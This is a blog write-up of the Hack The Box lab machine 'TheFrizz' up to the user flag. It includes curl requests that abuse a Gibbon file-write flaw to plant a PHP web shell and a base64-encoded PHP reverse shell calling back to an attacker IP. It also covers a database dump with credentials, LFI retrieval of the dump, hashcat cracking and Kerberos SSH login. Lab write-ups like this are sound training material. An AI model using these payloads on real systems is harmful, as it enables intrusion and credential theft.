886 words
4 minutes
TheFrizz
2025-03-24
Hack The Box
Windows
/
Kerberos
/
CVE

User Flag#

Nmap Scan#

As always we start with an Nmap scan

Terminal window
# Nmap 7.95 scan initiated Sat Mar 15 21:21:24 2025 as: /usr/lib/nmap/nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.60
Nmap scan report for 10.10.11.60 (10.10.11.60)
Host is up (0.050s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh?
| fingerprint-strings:
|   NULL:
|_    Exceeded MaxStartups
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
64081/tcp open  msrpc         Microsoft Windows RPC
64085/tcp open  msrpc         Microsoft Windows RPC
64093/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.95%I=7%D=3/15%Time=67D5EF6F%P=x86_64-pc-linux-gnu%r(NULL
SF:,16,"Exceeded\x20MaxStartups\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-03-16T04:22:59
|_  start_date: N/A


TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   50.73 ms 10.10.14.1 (10.10.14.1)
2   50.81 ms 10.10.11.60 (10.10.11.60)


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 15 21:24:35 2025 -- 1 IP address (1 host up) scanned in 191.48 seconds

I added frizzdc.frizz.htbto /etc/hosts

Terminal window
echo -e "10.10.11.60\tfrizzdc.frizz.htb" | sudo tee -a /etc/hosts
10.10.11.60  frizzdc.frizz.htb

I then looked at frizzdc.frizz.htb to check what we have It is an educational website powered by Gibbon The first thing I noticed was a notice stating that accounts will be unavailable for 48 hours due to Gibbon’s migration to Azure AD SSO. Additionally, I observed that the Gibbon version is 25.0.00. A quick googling shows that this version of Gibbon has a lot of vulnerabilities One critical issue in Gibbon version 25.0.00 is an unauthenticated Arbitrary File Write vulnerability. The endpoint rubrics_visualise_saveAjax.phps does not require authentication, allowing an attacker to create PHP files. This, in turn, enables unauthenticated Remote Code Execution (RCE) CVE-2023-45878. After reading the PoC, I crafted this payload to generate a PHP file that can allow me execute remote code

Terminal window
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

And got this response shell.php I’m inside a webservice now, I tried to get a reverse shell using Powershell payloads from revshells but I failed. And then I tried to update the php code I send with the post request using curl by writing a reverse shell to the file shell.php

Terminal window
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAKLy8gQ29weXJpZ2h0IChjKSAyMDIwIEl2YW4gU2luY2VrCi8vIHYyLjMKLy8gUmVxdWlyZXMgUEhQIHY1LjAuMCBvciBncmVhdGVyLgovLyBXb3JrcyBvbiBMaW51eCBPUywgbWFjT1MsIGFuZCBXaW5kb3dzIE9TLgovLyBTZWUgdGhlIG9yaWdpbmFsIHNjcmlwdCBhdCBodHRwczovL2dpdGh1Yi5jb20vcGVudGVzdG1vbmtleS9waHAtcmV2ZXJzZS1zaGVsbC4KY2xhc3MgU2hlbGwgewogICAgcHJpdmF0ZSAkYWRkciAgPSBudWxsOwogICAgcHJpdmF0ZSAkcG9ydCAgPSBudWxsOwogICAgcHJpdmF0ZSAkb3MgICAgPSBudWxsOwogICAgcHJpdmF0ZSAkc2hlbGwgPSBudWxsOwogICAgcHJpdmF0ZSAkZGVzY3JpcHRvcnNwZWMgPSBhcnJheSgKICAgICAgICAwID0+IGFycmF5KCdwaXBlJywgJ3InKSwgLy8gc2hlbGwgY2FuIHJlYWQgZnJvbSBTVERJTgogICAgICAgIDEgPT4gYXJyYXkoJ3BpcGUnLCAndycpLCAvLyBzaGVsbCBjYW4gd3JpdGUgdG8gU1RET1VUCiAgICAgICAgMiA9PiBhcnJheSgncGlwZScsICd3JykgIC8vIHNoZWxsIGNhbiB3cml0ZSB0byBTVERFUlIKICAgICk7CiAgICBwcml2YXRlICRidWZmZXIgID0gMTAyNDsgICAgLy8gcmVhZC93cml0ZSBidWZmZXIgc2l6ZQogICAgcHJpdmF0ZSAkY2xlbiAgICA9IDA7ICAgICAgIC8vIGNvbW1hbmQgbGVuZ3RoCiAgICBwcml2YXRlICRlcnJvciAgID0gZmFsc2U7ICAgLy8gc3RyZWFtIHJlYWQvd3JpdGUgZXJyb3IKICAgIHB1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkYWRkciwgJHBvcnQpIHsKICAgICAgICAkdGhpcy0+YWRkciA9ICRhZGRyOwogICAgICAgICR0aGlzLT5wb3J0ID0gJHBvcnQ7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIGRldGVjdCgpIHsKICAgICAgICAkZGV0ZWN0ZWQgPSB0cnVlOwogICAgICAgIGlmIChzdHJpcG9zKFBIUF9PUywgJ0xJTlVYJykgIT09IGZhbHNlKSB7IC8vIHNhbWUgZm9yIG1hY09TCiAgICAgICAgICAgICR0aGlzLT5vcyAgICA9ICdMSU5VWCc7CiAgICAgICAgICAgICR0aGlzLT5zaGVsbCA9ICdwb3dlcnNoZWxsJzsKICAgICAgICB9IGVsc2UgaWYgKHN0cmlwb3MoUEhQX09TLCAnV0lOMzInKSAhPT0gZmFsc2UgfHwgc3RyaXBvcyhQSFBfT1MsICdXSU5OVCcpICE9PSBmYWxzZSB8fCBzdHJpcG9zKFBIUF9PUywgJ1dJTkRPV1MnKSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgJHRoaXMtPm9zICAgID0gJ1dJTkRPV1MnOwogICAgICAgICAgICAkdGhpcy0+c2hlbGwgPSAnY21kLmV4ZSc7CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJGRldGVjdGVkID0gZmFsc2U7CiAgICAgICAgICAgIGVjaG8gIlNZU19FUlJPUjogVW5kZXJseWluZyBvcGVyYXRpbmcgc3lzdGVtIGlzIG5vdCBzdXBwb3J0ZWQsIHNjcmlwdCB3aWxsIG5vdyBleGl0Li4uXG4iOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJGRldGVjdGVkOwogICAgfQogICAgcHJpdmF0ZSBmdW5jdGlvbiBkYWVtb25pemUoKSB7CiAgICAgICAgJGV4aXQgPSBmYWxzZTsKICAgICAgICBpZiAoIWZ1bmN0aW9uX2V4aXN0cygncGNudGxfZm9yaycpKSB7CiAgICAgICAgICAgIGVjaG8gIkRBRU1PTklaRTogcGNudGxfZm9yaygpIGRvZXMgbm90IGV4aXN0cywgbW92aW5nIG9uLi4uXG4iOwogICAgICAgIH0gZWxzZSBpZiAoKCRwaWQgPSBAcGNudGxfZm9yaygpKSA8IDApIHsKICAgICAgICAgICAgZWNobyAiREFFTU9OSVpFOiBDYW5ub3QgZm9yayBvZmYgdGhlIHBhcmVudCBwcm9jZXNzLCBtb3Zpbmcgb24uLi5cbiI7CiAgICAgICAgfSBlbHNlIGlmICgkcGlkID4gMCkgewogICAgICAgICAgICAkZXhpdCA9IHRydWU7CiAgICAgICAgICAgIGVjaG8gIkRBRU1PTklaRTogQ2hpbGQgcHJvY2VzcyBmb3JrZWQgb2ZmIHN1Y2Nlc3NmdWxseSwgcGFyZW50IHByb2Nlc3Mgd2lsbCBub3cgZXhpdC4uLlxuIjsKICAgICAgICB9IGVsc2UgaWYgKHBvc2l4X3NldHNpZCgpIDwgMCkgewogICAgICAgICAgICAvLyBvbmNlIGRhZW1vbml6ZWQgeW91IHdpbGwgYWN0dWFsbHkgbm8gbG9uZ2VyIHNlZSB0aGUgc2NyaXB0J3MgZHVtcAogICAgICAgICAgICBlY2hvICJEQUVNT05JWkU6IEZvcmtlZCBvZmYgdGhlIHBhcmVudCBwcm9jZXNzIGJ1dCBjYW5ub3Qgc2V0IGEgbmV3IFNJRCwgbW92aW5nIG9uIGFzIGFuIG9ycGhhbi4uLlxuIjsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBlY2hvICJEQUVNT05JWkU6IENvbXBsZXRlZCBzdWNjZXNzZnVsbHkhXG4iOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJGV4aXQ7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIHNldHRpbmdzKCkgewogICAgICAgIEBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICAgICAgQHNldF90aW1lX2xpbWl0KDApOyAvLyBkbyBub3QgaW1wb3NlIHRoZSBzY3JpcHQgZXhlY3V0aW9uIHRpbWUgbGltaXQKICAgICAgICBAdW1hc2soMCk7IC8vIHNldCB0aGUgZmlsZS9kaXJlY3RvcnkgcGVybWlzc2lvbnMgLSA2NjYgZm9yIGZpbGVzIGFuZCA3NzcgZm9yIGRpcmVjdG9yaWVzCiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIGR1bXAoJGRhdGEpIHsKICAgICAgICAkZGF0YSA9IHN0cl9yZXBsYWNlKCc8JywgJyZsdDsnLCAkZGF0YSk7CiAgICAgICAgJGRhdGEgPSBzdHJfcmVwbGFjZSgnPicsICcmZ3Q7JywgJGRhdGEpOwogICAgICAgIGVjaG8gJGRhdGE7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIHJlYWQoJHN0cmVhbSwgJG5hbWUsICRidWZmZXIpIHsKICAgICAgICBpZiAoKCRkYXRhID0gQGZyZWFkKCRzdHJlYW0sICRidWZmZXIpKSA9PT0gZmFsc2UpIHsgLy8gc3VwcHJlc3MgYW4gZXJyb3Igd2hlbiByZWFkaW5nIGZyb20gYSBjbG9zZWQgYmxvY2tpbmcgc3RyZWFtCiAgICAgICAgICAgICR0aGlzLT5lcnJvciA9IHRydWU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vIHNldCBnbG9iYWwgZXJyb3IgZmxhZwogICAgICAgICAgICBlY2hvICJTVFJNX0VSUk9SOiBDYW5ub3QgcmVhZCBmcm9tICR7bmFtZX0sIHNjcmlwdCB3aWxsIG5vdyBleGl0Li4uXG4iOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJGRhdGE7CiAgICB9CiAgICBwcml2YXRlIGZ1bmN0aW9uIHdyaXRlKCRzdHJlYW0sICRuYW1lLCAkZGF0YSkgewogICAgICAgIGlmICgoJGJ5dGVzID0gQGZ3cml0ZSgkc3RyZWFtLCAkZGF0YSkpID09PSBmYWxzZSkgeyAvLyBzdXBwcmVzcyBhbiBlcnJvciB3aGVuIHdyaXRpbmcgdG8gYSBjbG9zZWQgYmxvY2tpbmcgc3RyZWFtCiAgICAgICAgICAgICR0aGlzLT5lcnJvciA9IHRydWU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vIHNldCBnbG9iYWwgZXJyb3IgZmxhZwogICAgICAgICAgICBlY2hvICJTVFJNX0VSUk9SOiBDYW5ub3Qgd3JpdGUgdG8gJHtuYW1lfSwgc2NyaXB0IHdpbGwgbm93IGV4aXQuLi5cbiI7CiAgICAgICAgfQogICAgICAgIHJldHVybiAkYnl0ZXM7CiAgICB9CiAgICAvLyByZWFkL3dyaXRlIG1ldGhvZCBmb3Igbm9uLWJsb2NraW5nIHN0cmVhbXMKICAgIHByaXZhdGUgZnVuY3Rpb24gcncoJGlucHV0LCAkb3V0cHV0LCAkaW5hbWUsICRvbmFtZSkgewogICAgICAgIHdoaWxlICgoJGRhdGEgPSAkdGhpcy0+cmVhZCgkaW5wdXQsICRpbmFtZSwgJHRoaXMtPmJ1ZmZlcikpICYmICR0aGlzLT53cml0ZSgkb3V0cHV0LCAkb25hbWUsICRkYXRhKSkgewogICAgICAgICAgICBpZiAoJHRoaXMtPm9zID09PSAnV0lORE9XUycgJiYgJG9uYW1lID09PSAnU1RESU4nKSB7ICR0aGlzLT5jbGVuICs9IHN0cmxlbigkZGF0YSk7IH0gLy8gY2FsY3VsYXRlIHRoZSBjb21tYW5kIGxlbmd0aAogICAgICAgICAgICAkdGhpcy0+ZHVtcCgkZGF0YSk7IC8vIHNjcmlwdCdzIGR1bXAKICAgICAgICB9CiAgICB9CiAgICAvLyByZWFkL3dyaXRlIG1ldGhvZCBmb3IgYmxvY2tpbmcgc3RyZWFtcyAoZS5nLiBmb3IgU1RET1VUIGFuZCBTVERFUlIgb24gV2luZG93cyBPUykKICAgIC8vIHdlIG11c3QgcmVhZCB0aGUgZXhhY3QgYnl0ZSBsZW5ndGggZnJvbSBhIHN0cmVhbSBhbmQgbm90IGEgc2luZ2xlIGJ5dGUgbW9yZQogICAgcHJpdmF0ZSBmdW5jdGlvbiBicncoJGlucHV0LCAkb3V0cHV0LCAkaW5hbWUsICRvbmFtZSkgewogICAgICAgICRmc3RhdCA9IGZzdGF0KCRpbnB1dCk7CiAgICAgICAgJHNpemUgPSAkZnN0YXRbJ3NpemUnXTsKICAgICAgICBpZiAoJHRoaXMtPm9zID09PSAnV0lORE9XUycgJiYgJGluYW1lID09PSAnU1RET1VUJyAmJiAkdGhpcy0+Y2xlbikgewogICAgICAgICAgICAvLyBmb3Igc29tZSByZWFzb24gV2luZG93cyBPUyBwaXBlcyBTVERJTiBpbnRvIFNURE9VVAogICAgICAgICAgICAvLyB3ZSBkbyBub3QgbGlrZSB0aGF0CiAgICAgICAgICAgIC8vIHdlIG5lZWQgdG8gZGlzY2FyZCB0aGUgZGF0YSBmcm9tIHRoZSBzdHJlYW0KICAgICAgICAgICAgd2hpbGUgKCR0aGlzLT5jbGVuID4gMCAmJiAoJGJ5dGVzID0gJHRoaXMtPmNsZW4gPj0gJHRoaXMtPmJ1ZmZlciA/ICR0aGlzLT5idWZmZXIgOiAkdGhpcy0+Y2xlbikgJiYgJHRoaXMtPnJlYWQoJGlucHV0LCAkaW5hbWUsICRieXRlcykpIHsKICAgICAgICAgICAgICAgICR0aGlzLT5jbGVuIC09ICRieXRlczsKICAgICAgICAgICAgICAgICRzaXplIC09ICRieXRlczsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICB3aGlsZSAoJHNpemUgPiAwICYmICgkYnl0ZXMgPSAkc2l6ZSA+PSAkdGhpcy0+YnVmZmVyID8gJHRoaXMtPmJ1ZmZlciA6ICRzaXplKSAmJiAoJGRhdGEgPSAkdGhpcy0+cmVhZCgkaW5wdXQsICRpbmFtZSwgJGJ5dGVzKSkgJiYgJHRoaXMtPndyaXRlKCRvdXRwdXQsICRvbmFtZSwgJGRhdGEpKSB7CiAgICAgICAgICAgICRzaXplIC09ICRieXRlczsKICAgICAgICAgICAgJHRoaXMtPmR1bXAoJGRhdGEpOyAvLyBzY3JpcHQncyBkdW1wCiAgICAgICAgfQogICAgfQogICAgcHVibGljIGZ1bmN0aW9uIHJ1bigpIHsKICAgICAgICBpZiAoJHRoaXMtPmRldGVjdCgpICYmICEkdGhpcy0+ZGFlbW9uaXplKCkpIHsKICAgICAgICAgICAgJHRoaXMtPnNldHRpbmdzKCk7CgogICAgICAgICAgICAvLyAtLS0tLSBTT0NLRVQgQkVHSU4gLS0tLS0KICAgICAgICAgICAgJHNvY2tldCA9IEBmc29ja29wZW4oJHRoaXMtPmFkZHIsICR0aGlzLT5wb3J0LCAkZXJybm8sICRlcnJzdHIsIDMwKTsKICAgICAgICAgICAgaWYgKCEkc29ja2V0KSB7CiAgICAgICAgICAgICAgICBlY2hvICJTT0NfRVJST1I6IHskZXJybm99OiB7JGVycnN0cn1cbiI7CiAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICBzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrZXQsIGZhbHNlKTsgLy8gc2V0IHRoZSBzb2NrZXQgc3RyZWFtIHRvIG5vbi1ibG9ja2luZyBtb2RlIHwgcmV0dXJucyAndHJ1ZScgb24gV2luZG93cyBPUwoKICAgICAgICAgICAgICAgIC8vIC0tLS0tIFNIRUxMIEJFR0lOIC0tLS0tCiAgICAgICAgICAgICAgICAkcHJvY2VzcyA9IEBwcm9jX29wZW4oJHRoaXMtPnNoZWxsLCAkdGhpcy0+ZGVzY3JpcHRvcnNwZWMsICRwaXBlcywgbnVsbCwgbnVsbCk7CiAgICAgICAgICAgICAgICBpZiAoISRwcm9jZXNzKSB7CiAgICAgICAgICAgICAgICAgICAgZWNobyAiUFJPQ19FUlJPUjogQ2Fubm90IHN0YXJ0IHRoZSBzaGVsbFxuIjsKICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgZm9yZWFjaCAoJHBpcGVzIGFzICRwaXBlKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIHN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGUsIGZhbHNlKTsgLy8gc2V0IHRoZSBzaGVsbCBzdHJlYW1zIHRvIG5vbi1ibG9ja2luZyBtb2RlIHwgcmV0dXJucyAnZmFsc2UnIG9uIFdpbmRvd3MgT1MKICAgICAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgICAgIC8vIC0tLS0tIFdPUksgQkVHSU4gLS0tLS0KICAgICAgICAgICAgICAgICAgICAkc3RhdHVzID0gcHJvY19nZXRfc3RhdHVzKCRwcm9jZXNzKTsKICAgICAgICAgICAgICAgICAgICBAZndyaXRlKCRzb2NrZXQsICJTT0NLRVQ6IFNoZWxsIGhhcyBjb25uZWN0ZWQhIFBJRDogIiAuICRzdGF0dXNbJ3BpZCddIC4gIlxuIik7CiAgICAgICAgICAgICAgICAgICAgZG8gewoJCQkJCQkkc3RhdHVzID0gcHJvY19nZXRfc3RhdHVzKCRwcm9jZXNzKTsKICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGZlb2YoJHNvY2tldCkpIHsgLy8gY2hlY2sgZm9yIGVuZC1vZi1maWxlIG9uIFNPQ0tFVAogICAgICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAiU09DX0VSUk9SOiBTaGVsbCBjb25uZWN0aW9uIGhhcyBiZWVuIHRlcm1pbmF0ZWRcbiI7IGJyZWFrOwogICAgICAgICAgICAgICAgICAgICAgICB9IGVsc2UgaWYgKGZlb2YoJHBpcGVzWzFdKSB8fCAhJHN0YXR1c1sncnVubmluZyddKSB7ICAgICAgICAgICAgICAgICAvLyBjaGVjayBmb3IgZW5kLW9mLWZpbGUgb24gU1RET1VUIG9yIGlmIHByb2Nlc3MgaXMgc3RpbGwgcnVubmluZwogICAgICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAiUFJPQ19FUlJPUjogU2hlbGwgcHJvY2VzcyBoYXMgYmVlbiB0ZXJtaW5hdGVkXG4iOyAgIGJyZWFrOyAvLyBmZW9mKCkgZG9lcyBub3Qgd29yayB3aXRoIGJsb2NraW5nIHN0cmVhbXMKICAgICAgICAgICAgICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLy8gdXNlIHByb2NfZ2V0X3N0YXR1cygpIGluc3RlYWQKICAgICAgICAgICAgICAgICAgICAgICAgJHN0cmVhbXMgPSBhcnJheSgKICAgICAgICAgICAgICAgICAgICAgICAgICAgICdyZWFkJyAgID0+IGFycmF5KCRzb2NrZXQsICRwaXBlc1sxXSwgJHBpcGVzWzJdKSwgLy8gU09DS0VUIHwgU1RET1VUIHwgU1RERVJSCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAnd3JpdGUnICA9PiBudWxsLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgJ2V4Y2VwdCcgPT4gbnVsbAogICAgICAgICAgICAgICAgICAgICAgICApOwogICAgICAgICAgICAgICAgICAgICAgICAkbnVtX2NoYW5nZWRfc3RyZWFtcyA9IEBzdHJlYW1fc2VsZWN0KCRzdHJlYW1zWydyZWFkJ10sICRzdHJlYW1zWyd3cml0ZSddLCAkc3RyZWFtc1snZXhjZXB0J10sIDApOyAvLyB3YWl0IGZvciBzdHJlYW0gY2hhbmdlcyB8IHdpbGwgbm90IHdhaXQgb24gV2luZG93cyBPUwogICAgICAgICAgICAgICAgICAgICAgICBpZiAoJG51bV9jaGFuZ2VkX3N0cmVhbXMgPT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBlY2hvICJTVFJNX0VSUk9SOiBzdHJlYW1fc2VsZWN0KCkgZmFpbGVkXG4iOyBicmVhazsKICAgICAgICAgICAgICAgICAgICAgICAgfSBlbHNlIGlmICgkbnVtX2NoYW5nZWRfc3RyZWFtcyA+IDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkdGhpcy0+b3MgPT09ICdMSU5VWCcpIHsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoaW5fYXJyYXkoJHNvY2tldCAgLCAkc3RyZWFtc1sncmVhZCddKSkgeyAkdGhpcy0+cncoJHNvY2tldCAgLCAkcGlwZXNbMF0sICdTT0NLRVQnLCAnU1RESU4nICk7IH0gLy8gcmVhZCBmcm9tIFNPQ0tFVCBhbmQgd3JpdGUgdG8gU1RESU4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkc3RyZWFtc1sncmVhZCddKSkgeyAkdGhpcy0+cncoJHBpcGVzWzJdLCAkc29ja2V0ICAsICdTVERFUlInLCAnU09DS0VUJyk7IH0gLy8gcmVhZCBmcm9tIFNUREVSUiBhbmQgd3JpdGUgdG8gU09DS0VUCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHN0cmVhbXNbJ3JlYWQnXSkpIHsgJHRoaXMtPnJ3KCRwaXBlc1sxXSwgJHNvY2tldCAgLCAnU1RET1VUJywgJ1NPQ0tFVCcpOyB9IC8vIHJlYWQgZnJvbSBTVERPVVQgYW5kIHdyaXRlIHRvIFNPQ0tFVAogICAgICAgICAgICAgICAgICAgICAgICAgICAgfSBlbHNlIGlmICgkdGhpcy0+b3MgPT09ICdXSU5ET1dTJykgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vIG9yZGVyIGlzIGltcG9ydGFudAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChpbl9hcnJheSgkc29ja2V0LCAkc3RyZWFtc1sncmVhZCddKS8qLS0tLS0tKi8pIHsgJHRoaXMtPnJ3ICgkc29ja2V0ICAsICRwaXBlc1swXSwgJ1NPQ0tFVCcsICdTVERJTicgKTsgfSAvLyByZWFkIGZyb20gU09DS0VUIGFuZCB3cml0ZSB0byBTVERJTgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgoJGZzdGF0ID0gZnN0YXQoJHBpcGVzWzJdKSkgJiYgJGZzdGF0WydzaXplJ10pIHsgJHRoaXMtPmJydygkcGlwZXNbMl0sICRzb2NrZXQgICwgJ1NUREVSUicsICdTT0NLRVQnKTsgfSAvLyByZWFkIGZyb20gU1RERVJSIGFuZCB3cml0ZSB0byBTT0NLRVQKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoKCRmc3RhdCA9IGZzdGF0KCRwaXBlc1sxXSkpICYmICRmc3RhdFsnc2l6ZSddKSB7ICR0aGlzLT5icncoJHBpcGVzWzFdLCAkc29ja2V0ICAsICdTVERPVVQnLCAnU09DS0VUJyk7IH0gLy8gcmVhZCBmcm9tIFNURE9VVCBhbmQgd3JpdGUgdG8gU09DS0VUCiAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICB9IHdoaWxlICghJHRoaXMtPmVycm9yKTsKICAgICAgICAgICAgICAgICAgICAvLyAtLS0tLS0gV09SSyBFTkQgLS0tLS0tCgogICAgICAgICAgICAgICAgICAgIGZvcmVhY2ggKCRwaXBlcyBhcyAkcGlwZSkgewogICAgICAgICAgICAgICAgICAgICAgICBmY2xvc2UoJHBpcGUpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICBwcm9jX2Nsb3NlKCRwcm9jZXNzKTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIC8vIC0tLS0tLSBTSEVMTCBFTkQgLS0tLS0tCgogICAgICAgICAgICAgICAgZmNsb3NlKCRzb2NrZXQpOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC8vIC0tLS0tLSBTT0NLRVQgRU5EIC0tLS0tLQoKICAgICAgICB9CiAgICB9Cn0KZWNobyAnPHByZT4nOwovLyBjaGFuZ2UgdGhlIGhvc3QgYWRkcmVzcyBhbmQvb3IgcG9ydCBudW1iZXIgYXMgbmVjZXNzYXJ5CiRzaCA9IG5ldyBTaGVsbCgnMTAuMTAuMTYuNTYnLCA0NDQ0KTsKJHNoLT5ydW4oKTsKdW5zZXQoJHNoKTsKLy8gZ2FyYmFnZSBjb2xsZWN0b3IgcmVxdWlyZXMgUEhQIHY1LjMuMCBvciBncmVhdGVyCi8vIEBnY19jb2xsZWN0X2N5Y2xlcygpOwplY2hvICc8L3ByZT4nOwo/Pg==" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

I setup a listener on port 4444 and got a reverse shell alt text I needed to escape the webservice, by investigating the current directory I could see an interesting config.php file alt text it contained some credentials for gibbon database alt text so I tried to dump the database so I can transfer it to my local machine to analyze it

Terminal window
mysqldump --user=MrGibbonsDB --password=MisterGibbs!Parrot!?1 gibbon > gibbon-backup.sql

alt text To transfer it locally, I exploited CVE-2023-34598, a Local File Inclusion (LFI) vulnerability. This vulnerability allows including the content of various files within the installation folder in the server’s response by manipulating the q parameter. To exploit this, I moved the SQL backup file into the Gibbon website’s installation folder and accessed it through the browser. alt text I found these credentials inside the dumped database. alt text I needed to crack the password, so I checked Gibbon’s source code to determine how the password is hashed Gibbon hashes passwords using SHA-256 with a prepended salt. To crack it, I used Hashcat with this command:

Terminal window
sudo hashcat -m 1420 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

After the cracking process, I retrieved the plaintext password using

Terminal window
sudo hashcat --show -m 1420 thefrizz/hash.txt
067f746faca44f170c6cd9d7c4bdac6bc:342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23

I tried to ssh using the username f.frizzle

Terminal window
ssh f.frizzle@frizz.htb
f.frizzle@frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).

However, I encountered the following error, After some research, I the ssh server is using GSSAPI (Generic Security Services API) with Kerberos for SSO authentication.
First of all, I updated /etc/ssh/ssh_config by enabling GSSAPI

Terminal window
GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes

And I had to create a krb5.conf file

[libdefaults]
    default_realm = FRIZZ.HTB


[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = 10.10.11.60
    }


[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

To access SSH using SSO, I needed to obtain a Ticket-Granting Ticket (TGT).
I initiated a ticket request using the username f.frizzle and password Jenni_Luvs_Magic23

Terminal window
kinit -V f.frizzle@FRIZZ.HTB

Output:

Terminal window
Using default cache: /tmp/krb5cc_1000
Using principal: f.frizzle@FRIZZ.HTB
Password for f.frizzle@FRIZZ.HTB:
Authenticated to Kerberos v5

To verify the ticket, I used:

Terminal window
klist

Output:

Terminal window
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: f.frizzle@FRIZZ.HTB


Valid starting       Expires              Service principal
03/28/2025 22:52:07  03/29/2025 08:52:07  krbtgt/FRIZZ.HTB@FRIZZ.HTB
    renew until 03/29/2025 22:51:34

finnaly I tried to ssh again

Terminal window
ssh f.frizzle@frizz.htb

alt text

And I got the user flag!

TheFrizz
https://dahmanisec.me/posts/thefrizz/thefrizz/
Author
Abderrahim Dahmani
Published at
2025-03-24
License
CC BY-NC-SA 4.0
VulnCicada
Checker
© 2025 Abderrahim Dahmani. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari